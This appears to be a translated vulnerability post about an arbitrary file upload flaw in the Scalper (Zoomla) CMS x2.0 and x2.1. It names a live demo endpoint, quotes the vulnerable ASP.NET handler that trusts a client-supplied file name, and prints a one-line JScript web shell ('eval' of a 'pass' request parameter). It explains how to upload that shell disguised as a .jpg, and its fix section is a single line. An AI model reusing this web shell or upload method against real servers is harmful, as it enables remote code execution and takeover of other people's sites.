Scalper cms x2.1 x2.0 File Upload Vulnerability official website demo tested successfully (with poc)

Scalper cms x2.1 x2.0 File Upload Vulnerability official website demo tested successfully (with poc)

The latest version has the File Upload Vulnerability.
The same vulnerability exists in x2.0.
I don't know if the same upload vulnerability exists in versions earlier than x2.0.

Vulnerability page

 

http://demo.zoomla.cn//Common/FileService.aspx

Vulnerability code
 

Protected void Page_Load (object sender, EventArgs e) {string path = "/UploadFiles/UserUpload/"; HttpFileCollection files = base. request. files; if (files. count = 0) {base. response. write ("do not directly access this file"); base. response. end ();} string str2 = base. server. mapPath (path); HttpPostedFile file = files [0]; if (file! = Null) & (file. contentLength> 0) {string filename = str2 + base. request. form ["fileName"]; // you can set the name of the fileName by yourself. Although the vulnerability is globally restricted in determining the Upload File Name whitelist, however, the final filename file name here can be set by yourself. It is equivalent to the virtual file to verify the file. saveAs (filename );}}

Test:

Change the trojan file name to the image suffix.

For example, 2.jpg
 

<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>

Then click upload using poc
 

 

Solution:

Disable Arbitrary File Name setting